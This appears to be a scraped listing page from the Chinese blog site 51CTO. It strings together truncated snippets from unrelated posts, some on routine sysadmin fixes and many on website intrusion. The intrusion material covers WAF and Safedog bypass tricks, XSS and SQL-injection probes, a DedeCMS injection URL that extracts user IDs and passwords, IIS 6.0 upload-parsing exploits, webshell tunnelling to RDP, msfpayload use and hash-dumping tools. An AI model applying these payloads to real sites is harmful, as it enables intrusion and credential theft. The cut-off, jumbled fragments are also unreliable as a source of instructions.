51CTO博客开发
解决方法:将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes将PermitRootLogin without-password修改为PermitRootLogin yes修改以上两条即可。
Can't exec "md5sum": 没有那个文件或目录 at /usr/share/perl/5.24/IPC/Open3.pm line 178, <STDIN> line 11.open2: exec of md5sum failed: No such file or directory at /usr/sbin/pam-auth-update line 394.dpkg:
WAF规则探测及绕过1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;3、尝试以下的payload<script>alert(1);</sc
set character_set_client='gbk';set character_set_connection='gbk';set character_set_database='gbk';set character_set_results='gbk';set character_set_server='gbk';select '
“Options”Tab页->”Display“二级Tab页->“HTTP Message Display”->“Change font”->修改为支持中文的系统字体,Windows用户建议“Microsoft Yahei”,Mac建议修改为“Roboto”或者“STIXIntegralIsSm”。
隐私是一种与公共利益、群体利益无关,当事人不愿他人知道或他人不便知道的个人信息,(只能公开于有保密义务的人)当事人不愿他人干涉或他人不便干涉的个人私事,以及当事人不愿他人侵入或他人不便侵入的个人领域。 随着生活习惯,人们生活水平逐渐提高了,出门也不要出了,吃饭也不要跑到外边去吃了,真是一机在手,啥都拥有,那么问题来了,当你在网上购物时你的快递单上的详细信息是否清除了?当你点外卖的时候,你
问题所在:关于虚拟机能ping通物理机,而物理机ping不通虚拟机问题解决。解决问题:遇到这样的情况就是重装虚拟机,或修复安装虚拟机。
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传 shell ,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在 asp 居多!2.asp ( aspx )+MSSQL 先考虑注入,一般的注入都有 DBowner 权限可以直接写 shell ;如果写不了,或者 web 与数据库分离,那就猜数据,从后台下手了,
当执行adb shell的时候出现:解决方法如下:先执行adb nodaemon server命令查看adb服务端口执行命令查看端口进程PID命令:netstat -ano | findstr "5037"启动任务管理器,点击任务管理器的查看-->选择列,如下图,然后把PID勾选上即可,然后找到上边端口进程PID结束掉进程既可。(可能每个进程PID不一样,但方法是一样的可以解决问题)
解决方法:将XP ISO文件解压到当前目录下,运行DOS进入到I386目录下,在DOS命令行下运行:winnt32.exe /syspart:c,就可以正常安装了。
Office 2016安装程序不仅不能选择要安装的组件,而且连安装路径都不能选,只能默认安装到C盘,根本就不能选择安装到D盘、E盘什么的,真是好霸道的总裁。不过这难不懂爱折腾的大神们,下面下载吧给出一个Office 2016自定义位置安装方法。Office 2016安装路径修改步骤1.安装前,按Ctrl+R键打开注册表编辑器,然后定位到如下位置:HKEY_LOCAL_MACHINESOFTWARE
前期准备: JDK:http://www.oracle.com/technetwork/java/javase/downloads/index-jsp-138363.html TOMCAT:http://tomcat.apache.org/这里版本自行下载自己需要的版本。中期安装
[autorun] Open= "U盘根目录下的文件" Shell\open= 打开 (& O) Shell\open\Command= "U盘根目录下的文件" Shell\open\Default=1 Shell\autoplay\Default=2 Shell\autoplay= 自动播放(& P) Shel
1、设置DHCP:leaf /etc/dhcp/dhcpd.conf 编辑dhcp服务器配置文件,修改如下:authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-
在Tomcat中配置虚拟目录的方法是编写一个xml文件,内容如下:<Context path="/www" docBase="/var/www" debug="0" reloadable="true" crossContext="true"></Context>其 中“path=“/www””表示配置的虚拟目录的名称,“docBase=“/var/www””是虚拟目录指向的
实际上远程桌面超过终端连接数的问题是很多站长遇到的问题;也有好多人因此而使用了一些黑客工具,比如什么3389强制连接工具等;实际上在windows操作系统中的mstsc已经拥有远程桌面强制踢用户下线的功能,只不过很多中国的站长和脚本小子不知道罢了。当然我也不是什么大牛,只要细心一点,看看说明文档就知道mstsc可以有/admin 或者/console参数,是可以远程登录控制台的,控制台的权限是很高
Set args = WScript.Arguments if args.count<>1 then msgbox "db.mdb":wscript.quit Set conn =CreateObject("ADODB.Connection") pwd="密"&chr(13)&ch
msfpayload 命令 帮助msfpayload -h 列出所有可用的攻击载荷 msfpayload windows/meterpreter/bind_tcp O 列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)msfpayload
首先,你要确定以下几点,否则可能无法实现: 1、你要跨到哪个域,你必须能管理那域上文件,因为这里要放一个通行文件。 2、你的Flash如果只有SWF,那不一定能实现,因为有时,Flash的AS中,要加入一句话。如果你是跨域调图片、视频一类的,可以用通行文件的方法。通行文件制作方法,请将以下代码存为 crossdomain.xml ,并放到要跨域的目标站点根目录下面。就是说,你的FLASH在
Query:是查询的意思,为了在数据库中寻找某一特定文件、网站、记录或一系列记录,由搜索引擎或数据库送出的消息。有三条命令查看:query process、query session、query user Shadow:允许您远程控制另一用户的活动会话。logoff:注销 tsshutdn 15 /powerdown 关闭服务器命令限止指定用户可登陆终端设置这里可以全部删掉,然
gethashes工具使用方法:在DOS环境下运行 gethashes $localsaminside 工具winglogonHACK 工具以上两种工具使用自行百度找方法。
使用方法:上传源码包中文件夹webshell下的脚本至网站目录,然后本地进行连接上传的webshell即可python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可python proxy.py -u http://17
一、dedecms找后台1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理员帐号,新版本的就直接转向了后台.2.include/dialog/config.php会爆出后台管理路径3.include/dialog/select_soft.php?activepath=/include/FCKeditor
先看版本如果是iis6.0 上传两次 1.asp;.jpg 或者通过 创建1.asp目录(有方法可以试着突破点变下画线) 或者直接上传 1.asp;jpg
正确的手工入侵方法1.判断有无注入点' ; and 1=1 and 1=22.猜表: 常见的表:admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0<
过安全狗主要过哪几方面:1.过注入2.过大马被阻拦访问3.过菜刀连接一句话被拦截4.过1.asp;.jpg这样的文件其他我没遇到了。。现在一点一点讲:1.过注入方法一:a.asp?aaa=%00&id=sql语句方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin2.过大马被阻拦访
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是
首先:注入exp有时候 有些 /plus/目录换成了 /plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33
IIS 6.0 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)IIS6.0 都会把此类后缀文件成功解析为 asp 文件。(站长评论:IIS6.0解析漏洞的成因,可以查阅罗哥写的一
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号